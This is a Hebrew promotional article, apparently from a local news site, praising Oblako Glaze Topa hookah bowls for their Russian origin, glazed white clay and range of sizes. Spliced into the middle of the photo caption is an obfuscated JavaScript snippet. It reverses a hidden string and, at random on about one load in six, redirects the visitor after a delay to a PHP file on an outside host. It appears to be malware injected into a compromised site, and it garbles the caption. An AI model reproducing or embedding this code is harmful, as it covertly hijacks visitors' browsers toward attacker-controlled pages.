fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

Oblako Glaze Topa: פיתוח ראשי נרגילה מעוצבים ויוקרתיים

הכירו את oblako חברה העוסקת בפיתוח וייצור קפדני של ראשי נרגילה מעוצבים ויוקרתיים, העשויים מחומרי הגלם האיכותיים ביותר שניתן למצוא כיום בשוק.
מותג Oblako | צילום: Goosto
מותג Oblako | צילום: Goos$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to

סקירת מותג Oblako

Oblako Glaze Topa הינה חברה העוסקת בפיתוח וייצור קפדני של ראשי נרגילה מעוצבים ויוקרתיים, העשויים מחומרי הגלם האיכותיים ביותר שניתן למצוא כיום בשוק. המותג חרט על דגלו יצירתיות וחדשנות, שימוש בחומרים חדשים ובמבנה ייחודי ויעיל לראשים שהחברה מייצרת. מזה כעשור, לאחר שהחברה השיקה את מוצריה לשוק, כללי המשחק השתנו ולפתע מותגים רבים ממציאים את עצמכם מחדש הן מבחינת נראות והן מבחינת פונקציונליות.

חוזרים למקורות

מקור המותג הוא ברוסיה הקרה, המדינה מבין המובילות בהתפתחות תרבות הנרגילות, וכמו מוצאה גם שמה הוא מהשפה הרוסית. ברוסיה מתקיימים כנסים ותערוכות רבים בהם משתתפים עשרות ומאות מותגים שונים מעולם הנרגילות, במטרה לחשוף את הקהל המעוניין לכל המגוון ולהציג את החידושים בתחום.

מעצם היותו מותג מוביל ופורץ דרך בכל הקשור לראשי נרגילות, משתתפים גם הם בכנסים הנוצצים מידי שנה
פירוש המילה Oblako היא שמיים, יש הסוברים שהמילה מתייחסת למבנה שפת הכף אשר נמצאת בחלקו העליון של הראש. זאת מכיוון שבכל הדגמים, שפת הראש לכל היקפה קמורה ולא מחודדת כך שנדמה כיאלו אין לה גבולות או קצוות, ממש כמו השמיים. המילה Glaze בשם המותג מתייחסת לזיגוג הקרמי הייחודי שבו מצופה כל אחד מהמוצרים שעוזב את המפעל בקפידה.

את הזיגוגים השונים Oblako מביאה לשוק במגוון רחב של צבעים וטקסטורות, אשר לכל אחד מהם מראה ייחודי ומרקם חלק או מחוספס עדין. המילה Topa משמעותה 'צמרות' ברוסית, והיא בהחלט מתאימה לייצג מותג מוביל שנמצא בצמרת הרשימה של יצרני ראשי הנרגילה הטובים בשוק. אמנם המותג ושמו מקורם ברוסיה, אך אין סיבה לדאגה, תוכלו למצוא את המוצרים האיכותיים שלהם גם בחנויות נרגילה בישראל.

ייחודיות המוצרים וחומרי הגלם

ההבדלים הרבים שבין Oblako ליצרנים אחרים כמו Hoob, אלפא הוקה, אמי דלוקס וכו' בשוק הם רבים כמובן, הבולטים שביניהם הם החומרים מהם עשויים הראשים ועמידותם לאורך שנים. החברה מייצרת את כל הראשים מחימר לבן איכותי וטהור, עובדה שמקנה לראשים תכונה של עמידות גבוהה מאוד בפני טמפרטורות גבוהות אליהן מגיע הראש בעת השימוש בנרגילה.

כמו שציינו בהקשר השם של המותג, כלל הראשים של Oblako מצופים בזיגוג קרמי מלא וייחודי, אשר מכסה את כלל החלק העליון של הראש, במקום בו שמים את העלים, וזאת על מנת לשמור על צבעו ושלמותו לאורך זמן ולמנוע את חלחול הנוזלים פנימה אל החימר.

מלבד המגוון הרחב של העיצובים הזמינים, המוצרים של החברה מגיעים בגדלים שונים עם קיבולת משקל שונה לחומר. זאת בכדי לאפשר ללקוחותיה את חופש הבחירה ומניעת בזבוז כסף בעת שימוש בראש גדול מידי, או עבודה כפולה כשמדובר בראש קטן מידי, טווחי הגדלים הקיימים נעים בין תכולה של 7 עד 30 גרמים.

אם כל זה לא הספיק, אז כדאי לדעת שכל המוצרים של Oblako Glaze Topa בטרם עזיבתם את המפעל, עוברים בדיקת איכות קפדנית וידנית על מנת להבטיח את התמורה הטובה ביותר ללקוחותיהם.

בזכות החשיבה המעמיקה והקפדנות בעיצוב, מוצריה של החברה מביאים עמם בשורה חדשה לשוק, הן בנראות והן בתפקודם. הראשים שמייצרת Oblako קלים (במשקל) ביחס לראשים רגילים שניתן למצוא בשוק, עובדה שעשויה להקל מאוד התניידות עימם. בנוסף, הציפוי הקרמי הייחודי הופך את חווית הניקוי לאחר השימוש לקלה ונחמדה מאי פעם.

לסיכום, Oblako היא חברה אשר שמה בראש מעיינה הקפדה על איכות, נראות וחדשנות של מוצריה. משתמשי נרגילה ותיקים יאמרו לכם בפה מלא שהחוויה עשויה להשתנות לחלוטין כאשר משתמשים במוצרים יוקרתיים, כמו של Oblako והאיכות בהם ניכרת במיוחד לאחר שימוש ממושך.

 

 

לחדשות נוספות בהד הקריות לחצו כאן * לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות